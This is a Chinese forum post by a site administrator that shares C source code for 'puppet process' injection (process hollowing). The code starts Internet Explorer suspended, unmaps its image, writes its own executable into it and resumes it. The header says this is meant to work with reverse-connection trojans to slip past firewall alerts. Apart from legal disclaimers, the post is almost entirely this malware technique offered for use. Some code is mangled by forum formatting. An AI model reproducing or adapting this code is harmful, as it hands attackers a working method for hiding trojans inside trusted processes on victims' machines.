HanDs
管理员

[Visual Studio文章] 草牛傀儡进程代码 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

*********************************************************************
    Author: Polymorphours
    Date: 2005/1/10    Modified by: XiCao
    Date: 2006/10/31
    另一种将自己代码注入傀儡进程的方法,配合反弹木马,可绕过防火墙的
    反向连接报警。
**********************************************************************/
#include <stdio.h>
#include <windows.h>

BOOL UnloadShell(HANDLE ProcHnd, unsigned long BaseAddr);  typedef struct _ChildProcessInfo { DWORD dwBaseAddress; DWORD dwReserve; } CHILDPROCESS, *PCHILDPROCESS; BOOL FindIePath( char *IePath, int *dwBuffSize ); BOOL InjectProcess(void); DWORD GetSelfImageSize( HMODULE hModule ); BOOL CreateInjectProcess( PPROCESS_INFORMATION pi, PCONTEXT pThreadCxt, CHILDPROCESS *pChildProcess ); char szIePath[MAX_PATH]; int main(void) { if (InjectProcess() ) {     printf("This is my a test code,made by (Polymorphours)shadow3.\r\n"); } else {     MessageBox(NULL,"进程插入完成","Text",MB_OK); } return 0; } BOOL FindIePath(OUT char *IePath, OUT int *dwBuffSize) { char szSystemDir[MAX_PATH]; GetSystemDirectory(szSystemDir,MAX_PATH);

szSystemDir[2] = '\0'; lstrcat(szSystemDir,"[url=file://program/]\\Program[/url] Files\\Internet Explorer\\iexplore.exe"); lstrcpy(IePath, szSystemDir); return TRUE; } BOOL InjectProcess(void) { char szModulePath[MAX_PATH]; DWORD dwImageSize = 0;

STARTUPINFO si; PROCESS_INFORMATION pi; CONTEXT ThreadCxt; DWORD *PPEB; DWORD dwWrite = 0; CHILDPROCESS stChildProcess; LPVOID lpVirtual = NULL; PIMAGE_DOS_HEADER pDosheader = NULL; PIMAGE_NT_HEADERS pVirPeHead = NULL;

HMODULE hModule = NULL;

ZeroMemory( szModulePath, MAX_PATH ); ZeroMemory( szIePath, MAX_PATH );

GetModuleFileName( NULL, szModulePath, MAX_PATH ); FindIePath( szIePath, NULL );

if ( lstrcmpiA( szIePath, szModulePath ) == 0 ) { //当前运行在IE空间里     return FALSE; }

hModule = GetModuleHandle( NULL ); if ( hModule == NULL ) {     return FALSE; }

pDosheader = (PIMAGE_DOS_HEADER)hModule; pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);

dwImageSize = GetSelfImageSize(hModule);

// 以挂起模式启动一个傀儡进程,这里为了传透防火墙,使用IE进程 if ( CreateInjectProcess(&pi, &ThreadCxt, &stChildProcess )) {     printf("CHILD PID: [%d]\r\n",pi.dwProcessId);     // 卸载需要注入进程中的代码     if( UnloadShell(pi.hProcess, stChildProcess.dwBaseAddress) )     {      // 重新分配内存      lpVirtual = VirtualAllocEx(       pi.hProcess,       (LPVOID)hModule,       dwImageSize,       MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);         if( lpVirtual )      {       printf("Unmapped and Allocated Mem Success.\r\n");      }     }     else     {      printf("ZwUnmapViewOfSection() failed.\r\n");      return TRUE;     }       if(lpVirtual)     {      PPEB = (DWORD *)ThreadCxt.Ebx;      // 重写装载地址      WriteProcessMemory(       pi.hProcess,       &PPEB[2],       &lpVirtual,       sizeof(DWORD),       &dwWrite);         // 写入自己进程的代码到目标进程      if ( WriteProcessMemory(       pi.hProcess,       lpVirtual,       hModule,       dwImageSize,       &dwWrite) )      {       printf("image inject into process success.\r\n");           ThreadCxt.ContextFlags = CONTEXT_FULL;       if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )       {        ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;       }       else       {        ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;       } #ifdef DEBUG       printf("EAX = [0x%08x]\r\n",ThreadCxt.Eax);       printf("EBX = [0x%08x]\r\n",ThreadCxt.Ebx);       printf("ECX = [0x%08x]\r\n",ThreadCxt.Ecx);       printf("EDX = [0x%08x]\r\n",ThreadCxt.Edx);       printf("EIP = [0x%08x]\r\n",ThreadCxt.Eip); #endif       SetThreadContext(pi.hThread, &ThreadCxt);       ResumeThread(pi.hThread);      }      else      {       printf("WirteMemory Failed,code:%d\r\n",GetLastError());       TerminateProcess(pi.hProcess, 0);      }     }     else     {      printf("VirtualMemory Failed,code:%d\r\n",GetLastError());      TerminateProcess(pi.hProcess, 0);     } } return TRUE; } DWORD GetSelfImageSize(HMODULE hModule) { DWORD dwImageSize; _asm {     mov ecx,0x30     mov eax, fs:[ecx]     mov eax, [eax + 0x0c]     mov esi, [eax + 0x0c]     add esi,0x20     lodsd     mov dwImageSize,eax } return dwImageSize; } BOOL CreateInjectProcess(         PPROCESS_INFORMATION pi,         PCONTEXT pThreadCxt,         CHILDPROCESS *pChildProcess ) { STARTUPINFO si;

DWORD *PPEB; DWORD read;

// 使用挂起模式启动ie if( CreateProcess(     NULL,     szIePath,     NULL,     NULL,     0,     CREATE_SUSPENDED,     NULL,     NULL,     &si,     pi )) {     pThreadCxt->ContextFlags = CONTEXT_FULL;     GetThreadContext(pi->hThread, pThreadCxt);       PPEB = (DWORD *)pThreadCxt->Ebx;     // 得到ie的装载基地址     ReadProcessMemory(      pi->hProcess,      &PPEB[2],      (LPVOID)&(pChildProcess->dwBaseAddress),      sizeof(DWORD),      &read );       return TRUE; } return FALSE; } BOOL UnloadShell(HANDLE ProcHnd, unsigned long BaseAddr)           typedef unsigned long (__stdcall *pfZwUnmapViewOfSection)(unsigned long, unsigned long);         pfZwUnmapViewOfSection ZwUnmapViewOfSection = NULL;

     BOOL res = FALSE;         HMODULE m = LoadLibrary("ntdll.dll");         if(m) {             ZwUnmapViewOfSection = (pfZwUnmapViewOfSection)GetProcAddress(m, "ZwUnmapViewOfSection");             if(ZwUnmapViewOfSection)                 res = (ZwUnmapViewOfSection((unsigned long)ProcHnd, BaseAddr) == 0);             FreeLibrary(m);                return res; }


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
傀儡 进程 代码
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复